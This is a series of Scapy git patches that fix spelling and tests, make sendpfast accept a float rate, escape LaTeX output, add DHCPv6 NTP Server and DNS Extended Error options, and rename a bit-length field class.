isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generation-software)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(scapy)' + +p = seq.frames[1] +assert isinstance(p, h2.H2Frame) +assert p.type == 0 +assert len(p.flags) == 1 +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2DataFrame) +pay = p[h2.H2DataFrame] +assert pay.data == body + = HTTP/2 HPackHdrTable : Parsing Textual Representation without body ~ http2 hpack hpackhdrtable helpers From 341b285cea0f17ed7e52a01b5cc59bd62d5e6ec9 Mon Sep 17 00:00:00 2001 From: Justin Breed <14262936+jbreed@users.noreply.github.com> Date: Tue, 26 Sep 2023 15:21:00 -0600 Subject: [PATCH 1095/1632] Resolve Issue_4006 Sendpfast accepts a float for the PPS value as well as the underlying tcpreplay; however, this is converted to an integer in the tcpreplay string causing flows needing refined throughput values to be inaccurate. This is a very simple fix by changing it from an integer conversion to a float. I have been doing this manually using sed in docker build to patch this, but should have submitted this when originally found. --- scapy/sendrecv.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index a994d0399b3..5c7a5a2b3c5 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -515,7 +515,7 @@ def sendpfast(x, # type: _PacketIterable iface = conf.iface argv = [conf.prog.tcpreplay, "--intf1=%s" % network_name(iface)] if pps is not None: - argv.append("--pps=%i" % pps) + argv.append("--pps=%f" % pps) elif mbps is not None: argv.append("--mbps=%f" % mbps) elif realtime is not None: From 148ab7b41f951bdd424ee8c61b8fd97eea761677 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 6 Oct 2023 16:15:10 +0200 Subject: [PATCH 1096/1632] Fix codespell (#4137) * fix codespell * revert change * Revert "revert change" This reverts commit a36d24a0f2dc058d6d61676094c6db746434a721. * revert changes * add exception to codespell * add exception to codespell --- .config/codespell_ignore.txt | 1 + doc/scapy/layers/http.rst | 2 +- scapy/contrib/ife.py | 2 +- scapy/contrib/ppi_geotag.py | 2 +- scapy/contrib/socks.py | 4 ++-- scapy/layers/bluetooth.py | 2 +- scapy/layers/gssapi.py | 2 +- scapy/libs/winpcapy.py | 2 +- scapy/modules/krack/__init__.py | 2 +- scapy/modules/krack/automaton.py | 2 +- test/contrib/automotive/ccp.uts | 4 ++-- test/contrib/eigrp.uts | 2 +- test/scapy/layers/tls/tlsclientserver.uts | 2 +- 13 files changed, 15 insertions(+), 14 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index b2c1a5b5a27..6405c1d1111 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -39,3 +39,4 @@ vas wan wanna webp +widgits diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index 9912f80aa68..aef497386cd 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -23,7 +23,7 @@ To summarize, the frames can be split in 3 different ways: - using ``Content-Length``: the header of the HTTP frame announces the total length of the frame - None of the above: the HTTP frame ends when the TCP stream ends / when a TCP push happens. -Moreover, each frame may be aditionnally compressed, depending on the algorithm specified in the HTTP header: +Moreover, each frame may be additionally compressed, depending on the algorithm specified in the HTTP header: - ``compress``: compressed using *LZW* - ``deflate``: compressed using *ZLIB* diff --git a/scapy/contrib/ife.py b/scapy/contrib/ife.py index b71368b885f..ac93f2aebb9 100644 --- a/scapy/contrib/ife.py +++ b/scapy/contrib/ife.py @@ -59,7 +59,7 @@ class IFETlv(Packet): """ - Parent Class interhit by all ForCES TLV strucutures + Parent Class interhit by all ForCES TLV structures """ name = "IFETlv" diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index ecb8c226de8..80e47f78769 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -278,7 +278,7 @@ def _FlagsList(myfields): 8: "GPS Derived", 9: "INS Derived", 10: "Compass Derived", - 11: "Acclerometer Derived", + 11: "Accelerometer Derived", 12: "Human Derived", }) diff --git a/scapy/contrib/socks.py b/scapy/contrib/socks.py index 1aadb5cf2f8..983e23f47f4 100644 --- a/scapy/contrib/socks.py +++ b/scapy/contrib/socks.py @@ -110,7 +110,7 @@ class SOCKS4Reply(Packet): overload_fields = {SOCKS: {"vn": 0x0}} fields_desc = [ ByteEnumField("cd", 90, _socks4_cd_reply), - ] + SOCKS4Request.fields_desc[1:-2] # Re-use dstport, dst and userid + ] + SOCKS4Request.fields_desc[1:-2] # Reuse dstport, dst and userid # SOCKS v5 - TCP @@ -174,7 +174,7 @@ class SOCKS5UDP(Packet): fields_desc = [ ShortField("res", 0), ByteField("frag", 0), - ] + SOCKS5Request.fields_desc[2:] # Re-use the atyp, addr and port fields + ] + SOCKS5Request.fields_desc[2:] # Reuse the atyp, addr and port fields def guess_payload_class(self, s): if self.port == 0: diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 3b82842f6bb..e87b3541c5f 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1878,7 +1878,7 @@ class LowEnergyBeaconHelper: """ Helpers for building packets for Bluetooth Low Energy Beacons. - Implementors provide a :meth:`build_eir` implementation. + Implementers provide a :meth:`build_eir` implementation. This is designed to be used as a mix-in -- see ``scapy.contrib.eddystone`` and ``scapy.contrib.ibeacon`` for examples. diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 954cb65c868..ae598c6c0af 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -233,7 +233,7 @@ class NEGOEX_MESSAGE_HEADER(Packet): 0x01: "ACCEPTOR_NEGO", 0x02: "INITIATOR_META_DATA", 0x03: "ACCEPTOR_META_DATA", - 0x04: "CHALENGE", + 0x04: "CHALLENGE", 0x05: "AP_REQUEST", 0x06: "VERIFY", 0x07: "ALERT"}), diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index 38ea0a83359..8c9b88c677f 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -6,7 +6,7 @@ # Modified for scapy's usage - To support Npcap/Monitor mode # -# NOTE: the "winpcap" in the name nonwithstanding, this is for use +# NOTE: the "winpcap" in the name notwithstanding, this is for use # with libpcap on non-Windows platforms, as well as for WinPcap and Npcap. from ctypes import * diff --git a/scapy/modules/krack/__init__.py b/scapy/modules/krack/__init__.py index 0c72d40a6fd..f4178b62f47 100644 --- a/scapy/modules/krack/__init__.py +++ b/scapy/modules/krack/__init__.py @@ -22,7 +22,7 @@ The output logs will indicate if one of the vulnerability have been triggered. Outputs for vulnerable devices: -- IV re-use!! Client seems to be vulnerable to handshake 3/4 replay +- IV reuse!! Client seems to be vulnerable to handshake 3/4 replay (CVE-2017-13077) - Broadcast packet accepted twice!! (CVE-2017-13080) - Client has installed an all zero encryption key (TK)!! diff --git a/scapy/modules/krack/automaton.py b/scapy/modules/krack/automaton.py index bb05728a271..5fd6fc99ae8 100644 --- a/scapy/modules/krack/automaton.py +++ b/scapy/modules/krack/automaton.py @@ -722,7 +722,7 @@ def extract_iv(self, pkt): self.last_iv = iv else: if iv <= self.last_iv: - log_runtime.warning("IV re-use!! Client seems to be " + log_runtime.warning("IV reuse!! Client seems to be " "vulnerable to handshake 3/4 replay " "(CVE-2017-13077)" ) diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index 467d41c287b..b267317a580 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -877,7 +877,7 @@ assert dto.hashret() == cro.hashret() + Tests on a virtual CAN-Bus -= CAN Socket sr1 with dto.ansers(cro) == True += CAN Socket sr1 with dto.answers(cro) == True sock1 = TestSocket(CCP) sock2 = TestSocket(CAN) @@ -903,7 +903,7 @@ assert hasattr(dto, "load") == False assert dto.MTA0_extension == 2 assert dto.MTA0_address == 0x34002006 -= CAN Socket sr1 with dto.ansers(cro) == False += CAN Socket sr1 with dto.answers(cro) == False sock1 = TestSocket(CCP) sock2 = TestSocket(CAN) diff --git a/test/contrib/eigrp.uts b/test/contrib/eigrp.uts index cb29649e953..70e5ca48be7 100644 --- a/test/contrib/eigrp.uts +++ b/test/contrib/eigrp.uts @@ -160,7 +160,7 @@ p = IP()/EIGRP(tlvlist=[EIGRPv6ExtRoute(prefixlen=99, dst="2000::")]) struct.unpack("!H", p[EIGRPv6ExtRoute].build()[2:4])[0] == 70 + Stub Flags -* The receive-only flag is always set, when a router anounces itself as stub router. +* The receive-only flag is always set, when a router announces itself as stub router. = Receive-Only p = IP()/EIGRP(tlvlist=[EIGRPStub(flags="receive-only")]) diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index f0a86c0e3c5..87b8a593db6 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -254,7 +254,7 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, name="test_tls_client %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads - print("Syncrhonising...") + print("Synchronising...") assert q_.get(timeout=5) is True time.sleep(1) print("Thread synchronised") From 619d1e45f39f2f705e59e8da417b090ea4ec3049 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 9 Oct 2023 09:06:23 +0200 Subject: [PATCH 1097/1632] Fix tests (#4140) * Fix PyPy3 tests * Fix Windows tests --- test/configs/windows.utsc | 1 - tox.ini | 3 ++- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 5aaab483f48..09691d2af34 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -3,7 +3,6 @@ "test\\*.uts", "test\\scapy\\layers\\*.uts", "test\\scapy\\layers\\tls\\*.uts", - "test\\tls\\tests_tls_netaccess.uts", "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\scanner\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", diff --git a/tox.ini b/tox.ini index 26272335d98..ebd54457f1b 100644 --- a/tox.ini +++ b/tox.ini @@ -32,7 +32,8 @@ deps = mock coverage[toml] python-can # disabled on windows because they require c++ dependencies - brotli ; sys_platform != 'win32' + # brotli 1.1.0 broken https://github.com/google/brotli/issues/1072 + brotli < 1.1.0 ; sys_platform != 'win32' zstandard ; sys_platform != 'win32' platform = linux_non_root,linux_root: linux From 06fc74b0f37e4fc68abde735b6164085aae9cfbe Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 9 Oct 2023 14:59:39 +0200 Subject: [PATCH 1098/1632] Fix LatexTheme to escape "#" (#4138) --- scapy/packet.py | 6 +++++- scapy/themes.py | 9 +++++++++ test/regression.uts | 17 +++++++++++++++++ 3 files changed, 31 insertions(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 4074d12789f..a4b94491d14 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1442,7 +1442,11 @@ def _show_or_dump(self, fvalue = self.getfieldval(f.name) if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)): # noqa: E501 pad = max(0, 10 - len(f.name)) * " " - s += "%s \\%s%s\\\n" % (label_lvl + lvl, ncol(f.name), pad) + s += "%s %s%s%s%s\n" % (label_lvl + lvl, + ct.punct("\\"), + ncol(f.name), + pad, + ct.punct("\\")) fvalue_gen = SetGen( fvalue, _iterpacket=0 diff --git a/scapy/themes.py b/scapy/themes.py index b293021718c..528b6584fec 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -271,6 +271,10 @@ def __getattr__(self, attr): class LatexTheme(FormatTheme): + r""" + You can prepend the output from this theme with + \tt\obeyspaces\obeylines\tiny\noindent + """ style_prompt = r"\textcolor{blue}{%s}" style_not_printable = r"\textcolor{gray}{%s}" style_layer_name = r"\textcolor{red}{\bf %s}" @@ -289,6 +293,11 @@ class LatexTheme(FormatTheme): # style_odd = "" style_logo = r"\textcolor{green}{\bf %s}" + def __getattr__(self, attr: str) -> Callable[[Any], str]: + from scapy.utils import tex_escape + styler = super(LatexTheme, self).__getattr__(attr) + return lambda x: styler(tex_escape(x)) + class LatexTheme2(FormatTheme): style_prompt = r"@`@textcolor@[@blue@]@@[@%s@]@" diff --git a/test/regression.uts b/test/regression.uts index c1a1ad0c7f6..b4ec23cb79f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -110,6 +110,23 @@ def test_list_contrib(): test_list_contrib() += Test packet show() on LatexTheme +% with LatexTheme + +class SmallPacket(Packet): + fields_desc = [ByteField("a", 0)] + +conf_color_theme = conf.color_theme +conf.color_theme = LatexTheme() +pkt = SmallPacket() +with ContextManagerCaptureOutput() as cmco: + pkt.show() + result = cmco.get_output().strip() + +assert result == '\\#\\#\\#[ \\textcolor{red}{\\bf SmallPacket} ]\\#\\#\\# \n \\textcolor{blue}{a} = \\textcolor{purple}{0}' +conf.color_theme = conf_color_theme + + = Test automatic doc generation ~ command From e6bf2d4396f782f3a0ce4ef70b55437532599c9d Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 9 Oct 2023 23:49:30 +0300 Subject: [PATCH 1099/1632] [DHCPv6] add the NTP Server Option (#4113) --- scapy/layers/dhcp6.py | 56 +++++++++++++++++++++++++++ test/scapy/layers/dhcp6.uts | 75 +++++++++++++++++++++++++++++++++++++ 2 files changed, 131 insertions(+) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 776d2113c13..4022655648e 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -116,6 +116,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): 41: "OPTION_NEW_POSIX_TIMEZONE", # RFC4833 42: "OPTION_NEW_TZDB_TIMEZONE", # RFC4833 48: "OPTION_LQ_CLIENT_LINK", # RFC5007 + 56: "OPTION_NTP_SERVER", # RFC5908 59: "OPT_BOOTFILE_URL", # RFC5970 60: "OPT_BOOTFILE_PARAM", # RFC5970 61: "OPTION_CLIENT_ARCH_TYPE", # RFC5970 @@ -174,6 +175,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): # 46: "DHCP6OptLQClientTime", #RFC5007 # 47: "DHCP6OptLQRelayData", #RFC5007 48: "DHCP6OptLQClientLink", # RFC5007 + 56: "DHCP6OptNTPServer", # RFC5908 59: "DHCP6OptBootFileUrl", # RFC5790 60: "DHCP6OptBootFileParam", # RFC5970 61: "DHCP6OptClientArchType", # RFC5970 @@ -961,6 +963,60 @@ class DHCP6OptLQClientLink(_DHCP6OptGuessPayload): # RFC5007 length_from=lambda pkt: pkt.optlen)] +class DHCP6NTPSubOptSrvAddr(Packet): # RFC5908 sect 4.1 + name = "DHCP6 NTP Server Address Suboption" + fields_desc = [ShortField("optcode", 1), + ShortField("optlen", 16), + IP6Field("addr", "::")] + + def extract_padding(self, s): + return b"", s + + +class DHCP6NTPSubOptMCAddr(Packet): # RFC5908 sect 4.2 + name = "DHCP6 NTP Multicast Address Suboption" + fields_desc = [ShortField("optcode", 2), + ShortField("optlen", 16), + IP6Field("addr", "::")] + + def extract_padding(self, s): + return b"", s + + +class DHCP6NTPSubOptSrvFQDN(Packet): # RFC5908 sect 4.3 + name = "DHCP6 NTP Server FQDN Suboption" + fields_desc = [ShortField("optcode", 3), + FieldLenField("optlen", None, length_of="fqdn"), + DNSStrField("fqdn", "", + length_from=lambda pkt: pkt.optlen)] + + def extract_padding(self, s): + return b"", s + + +_ntp_subopts = {1: DHCP6NTPSubOptSrvAddr, + 2: DHCP6NTPSubOptMCAddr, + 3: DHCP6NTPSubOptSrvFQDN} + + +def _ntp_subopt_dispatcher(p, **kwargs): + cls = conf.raw_layer + if len(p) >= 2: + o = struct.unpack("!H", p[:2])[0] + cls = _ntp_subopts.get(o, conf.raw_layer) + return cls(p, **kwargs) + + +class DHCP6OptNTPServer(_DHCP6OptGuessPayload): # RFC5908 + name = "DHCP6 NTP Server Option" + fields_desc = [ShortEnumField("optcode", 56, dhcp6opts), + FieldLenField("optlen", None, length_of="ntpserver", + fmt="!H"), + PacketListField("ntpserver", [], + _ntp_subopt_dispatcher, + length_from=lambda pkt: pkt.optlen)] + + class DHCP6OptBootFileUrl(_DHCP6OptGuessPayload): # RFC5970 name = "DHCP6 Boot File URL Option" fields_desc = [ShortEnumField("optcode", 59, dhcp6opts), diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 2806add53c3..9aebfe4c94f 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1054,6 +1054,81 @@ raw(DHCP6OptLQClientLink(linkaddress=["2001:db8::1", "2001:db8::2"])) == b'\x000 a = DHCP6OptLQClientLink(b'\x000\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') a.optcode == 48 and a.optlen == 32 and len(a.linkaddress) == 2 and a.linkaddress[0] == "2001:db8::1" and a.linkaddress[1] == "2001:db8::2" + +############ +############ ++ Test DHCP6 Option - NTP Server + += DHCP6NTPSubOptSrvAddr - Basic dissection/instantiation +b = b'\x00\x01' + b'\x00\x10' + b'\x00' * 16 +assert raw(DHCP6NTPSubOptSrvAddr()) == b + +p = DHCP6NTPSubOptSrvAddr(b) +assert p.optcode == 1 and p.optlen == 16 and p.addr == '::' + += DHCP6NTPSubOptSrvAddr - Dissection/instantiation with specific values +b = b'\x00\x01' + b'\x00\x10' + b'\x20\x01\x0d\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +assert raw(DHCP6NTPSubOptSrvAddr(addr='2001:db8::1')) == b + +p = DHCP6NTPSubOptSrvAddr(b) +assert p.optcode == 1 and p.optlen == 16 and p.addr == '2001:db8::1' + += DHCP6NTPSubOptMCAddr - Basic dissection/instantiation +b = b'\x00\x02' + b'\x00\x10' + b'\x00' * 16 +assert raw(DHCP6NTPSubOptMCAddr()) == b + +p = DHCP6NTPSubOptMCAddr(b) +assert p.optcode == 2 and p.optlen == 16 and p.addr == '::' + += DHCP6NTPSubOptMCAddr - Dissection/instantiation with specific values +b = b'\x00\x02' + b'\x00\x10' + b'\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01' +assert raw(DHCP6NTPSubOptMCAddr(addr='ff02::101')) == b + +p = DHCP6NTPSubOptMCAddr(b) +assert p.optcode == 2 and p.optlen == 16 and p.addr == 'ff02::101' + += DHCP6NTPSubOptSrvFQDN - Basic dissection/instantiation +b = b'\x00\x03' + b'\x00\x01' + b'\x00' +assert raw(DHCP6NTPSubOptSrvFQDN()) == b + +p = DHCP6NTPSubOptSrvFQDN(b) +assert p.optcode == 3 and p.optlen == 1 and p.fqdn == b'.' + += DHCP6NTPSubOptSrvFQDN - Dissection/instantiation with specific values +b = b'\x00\x03' + b'\x00\x0d' + b'\x07example\x03com\x00' +assert raw(DHCP6NTPSubOptSrvFQDN(fqdn='example.com')) == b + +p = DHCP6NTPSubOptSrvFQDN(b) +assert p.optcode == 3 and p.optlen == 13 and p.fqdn == b'example.com.' + += DHCP6OptNTPServer - Basic dissection/instantiation +b = b'\x00\x38' + b'\x00\x00' +assert raw(DHCP6OptNTPServer()) == b + +p = DHCP6OptNTPServer(b) +assert p.optcode == 56 and p.optlen == 0 and p.ntpserver == [] + += DHCP6OptNTPServer - Dissection/instantiation with specific values +srv_addr = b'\x00\x01' + b'\x00\x10' + b'\x20\x01\x0d\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +mc_addr = b'\x00\x02' + b'\x00\x10' + b'\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01' +srv_fqdn = b'\x00\x03' + b'\x00\x0d' + b'\x07example\x03com\x00' +b = b'\x00\x38' + b'\x00\x39' + srv_addr + mc_addr + srv_fqdn + +p = DHCP6OptNTPServer( + ntpserver=[DHCP6NTPSubOptSrvAddr(addr='2001:db8::1'), + DHCP6NTPSubOptMCAddr(addr='ff02::101'), + DHCP6NTPSubOptSrvFQDN(fqdn='example.com'), + ] +) +assert raw(p) == b + +p = DHCP6OptNTPServer(b) +assert p.optcode == 56 and p.optlen == 57 and len(p.ntpserver) == 3 +assert p.ntpserver[0] == DHCP6NTPSubOptSrvAddr(srv_addr) +assert p.ntpserver[1] == DHCP6NTPSubOptMCAddr(mc_addr) +assert p.ntpserver[2] == DHCP6NTPSubOptSrvFQDN(srv_fqdn) + + ############ ############ + Test DHCP6 Option - Boot File URL From f872e339d0288611a626a069020f20573b08e5fc Mon Sep 17 00:00:00 2001 From: Antonio V??zquez Date: Mon, 28 Aug 2023 10:01:50 +0200 Subject: [PATCH 1100/1632] bluetooth: BluetoothMonitorSocket fix MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Antonio Vázquez --- scapy/layers/bluetooth.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index e87b3541c5f..ba4528f9a7d 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2086,7 +2086,7 @@ def recv(self, x=MTU): return HCI_Hdr(self.ins.recv(x)) -class BluetoothMonitorSocket(SuperSocket): +class BluetoothMonitorSocket(_BluetoothLibcSocket): desc = "read/write over a Bluetooth monitor channel" def __init__(self): From bb0164b692ff689a6720fb874e649227a2e458a5 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 1 Oct 2023 21:35:43 +0000 Subject: [PATCH 1101/1632] DNS: add Extended DNS Error EDNS0 Option MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit https://www.rfc-editor.org/rfc/rfc8914.html The patch was also cross-checked with Wireshark: ``` Option: Extended DNS Error Option Code: Extended DNS Error (15) Option Length: 45 Option Data: 000670726f6f66206f66206e6f6e2d6578697374656e6365206f66206578616d706c652e… Info Code: DNSSEC Bogus (6) Extra Text: proof of non-existence of example.com. NSEC ``` --- scapy/layers/dns.py | 53 ++++++++++++++++++++++++++++++++- test/scapy/layers/dns_edns0.uts | 23 ++++++++++++++ 2 files changed, 75 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 4191a7cf665..80634759bac 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -370,7 +370,8 @@ def i2m(self, pkt, s): # RFC 2671 - Extension Mechanisms for DNS (EDNS0) edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", - 5: "PING", 8: "edns-client-subnet", 10: "COOKIE"} + 5: "PING", 8: "edns-client-subnet", 10: "COOKIE", + 15: "Extended DNS Error"} class EDNS0TLV(Packet): @@ -394,6 +395,8 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): edns0type = struct.unpack("!H", _pkt[:2])[0] if edns0type == 8: return EDNS0ClientSubnet + if edns0type == 15: + return EDNS0ExtendedDNSError return EDNS0TLV @@ -491,6 +494,54 @@ class EDNS0ClientSubnet(Packet): length_from=lambda p: p.source_plen))] +# RFC 8914 - Extended DNS Errors + +# https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#extended-dns-error-codes +extended_dns_error_codes = { + 0: "Other", + 1: "Unsupported DNSKEY Algorithm", + 2: "Unsupported DS Digest Type", + 3: "Stale Answer", + 4: "Forged Answer", + 5: "DNSSEC Indeterminate", + 6: "DNSSEC Bogus", + 7: "Signature Expired", + 8: "Signature Not Yet Valid", + 9: "DNSKEY Missing", + 10: "RRSIGs Missing", + 11: "No Zone Key Bit Set", + 12: "NSEC Missing", + 13: "Cached Error", + 14: "Not Ready", + 15: "Blocked", + 16: "Censored", + 17: "Filtered", + 18: "Prohibited", + 19: "Stale NXDOMAIN Answer", + 20: "Not Authoritative", + 21: "Not Supported", + 22: "No Reachable Authority", + 23: "Network Error", + 24: "Invalid Data", + 25: "Signature Expired before Valid", + 26: "Too Early", + 27: "Unsupported NSEC3 Iterations Value", + 28: "Unable to conform to policy", + 29: "Synthesized", +} + + +# https://www.rfc-editor.org/rfc/rfc8914.html +class EDNS0ExtendedDNSError(Packet): + name = "DNS EDNS0 Extended DNS Error" + fields_desc = [ShortEnumField("optcode", 15, edns0types), + FieldLenField("optlen", None, length_of="extra_text", fmt="!H", + adjust=lambda pkt, x: x + 2), + ShortEnumField("info_code", 0, extended_dns_error_codes), + StrLenField("extra_text", "", + length_from=lambda pkt: pkt.optlen - 2)] + + # RFC 4034 - Resource Records for the DNS Security Extensions diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index d4893aac0ab..bd186694afa 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -96,3 +96,26 @@ assert raw(d) == raw_d d = DNSRROPT(raw_d) assert EDNS0ClientSubnet in d.rdata[0] and d.rdata[0].family == 2 and d.rdata[0].address == "2001:db8::" + + ++ EDNS0 - Extended DNS Error + += Basic instantiation & dissection + +b = b'\x00\x0f\x00\x02\x00\x00' + +p = EDNS0ExtendedDNSError() +assert raw(p) == b + +p = EDNS0ExtendedDNSError(b) +assert p.optcode == 15 and p.optlen == 2 and p.info_code == 0 and p.extra_text == b'' + +b = raw(EDNS0ExtendedDNSError(info_code="DNSSEC Bogus", extra_text="proof of non-existence of example.com. NSEC")) + +p = EDNS0ExtendedDNSError(b) +assert p.info_code == 6 and p.optlen == 45 and p.extra_text == b'proof of non-existence of example.com. NSEC' + +rropt = DNSRROPT(b'\x00\x00)\x04\xd0\x00\x00\x00\x00\x001\x00\x0f\x00-\x00\x06proof of non-existence of example.com. NSEC') +assert len(rropt.rdata) == 1 +p = rropt.rdata[0] +assert p.info_code == 6 and p.optlen == 45 and p.extra_text == b'proof of non-existence of example.com. NSEC' From 86a953badf10fc8c8b4f25d88e54e6e7c1c69c8d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 6 Oct 2023 18:59:13 +0000 Subject: [PATCH 1102/1632] Add BitLenField --- scapy/fields.py | 34 ++++++++++++++++++++++++++++++---- scapy/layers/sixlowpan.py | 4 ++-- test/fields.uts | 19 +++++++++++++++++++ 3 files changed, 51 insertions(+), 6 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index c3f02ff1a05..9c68ab002e9 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2427,7 +2427,7 @@ class BitField(_BitField[int]): __doc__ = _BitField.__doc__ -class BitFixedLenField(BitField): +class BitLenField(BitField): __slots__ = ["length_from"] def __init__(self, @@ -2437,7 +2437,7 @@ def __init__(self, ): # type: (...) -> None self.length_from = length_from - super(BitFixedLenField, self).__init__(name, default, 0) + super(BitLenField, self).__init__(name, default, 0) def getfield(self, # type: ignore pkt, # type: Packet @@ -2445,7 +2445,7 @@ def getfield(self, # type: ignore ): # type: (...) -> Union[Tuple[Tuple[bytes, int], int], Tuple[bytes, int]] # noqa: E501 self.size = self.length_from(pkt) - return super(BitFixedLenField, self).getfield(pkt, s) + return super(BitLenField, self).getfield(pkt, s) def addfield(self, # type: ignore pkt, # type: Packet @@ -2454,7 +2454,7 @@ def addfield(self, # type: ignore ): # type: (...) -> Union[Tuple[bytes, int, int], bytes] self.size = self.length_from(pkt) - return super(BitFixedLenField, self).addfield(pkt, s, val) + return super(BitLenField, self).addfield(pkt, s, val) class BitFieldLenField(BitField): @@ -2661,6 +2661,32 @@ def i2repr(self, return _EnumField.i2repr(self, pkt, x) +class BitLenEnumField(BitLenField, _EnumField[int]): + __slots__ = EnumField.__slots__ + + def __init__(self, + name, # type: str + default, # type: Optional[int] + length_from, # type: Callable[[Packet], int] + enum, # type: Dict[int, str] + **kwargs, # type: Any + ): + # type: (...) -> None + _EnumField.__init__(self, name, default, enum) + BitLenField.__init__(self, name, default, length_from, **kwargs) + + def any2i(self, pkt, x): + # type: (Optional[Packet], Any) -> int + return _EnumField.any2i(self, pkt, x) # type: ignore + + def i2repr(self, + pkt, # type: Optional[Packet] + x, # type: Union[List[int], int] + ): + # type: (...) -> Any + return _EnumField.i2repr(self, pkt, x) + + class ShortEnumField(EnumField[int]): __slots__ = EnumField.__slots__ diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index 91469092bb4..fd6247715ce 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -58,7 +58,7 @@ from scapy.fields import ( BitEnumField, BitField, - BitFixedLenField, + BitLenField, BitScalingField, ByteEnumField, ByteField, @@ -282,7 +282,7 @@ class LoWPAN_HC1(Packet): lambda pkt: pkt.nh == 1 and pkt.hc2 ), # Out of spec - BitFixedLenField("pad", 0, _get_hc1_pad) + BitLenField("pad", 0, _get_hc1_pad) ] def post_dissect(self, data): diff --git a/test/fields.uts b/test/fields.uts index 0dfccfd1486..ae66d1095bf 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -336,7 +336,26 @@ p = TestBFLenF(b"\xff\x6fabcdeFGH") p assert p.len == 6 and p.str == b"abcde" and Raw in p and p[Raw].load == b"FGH" 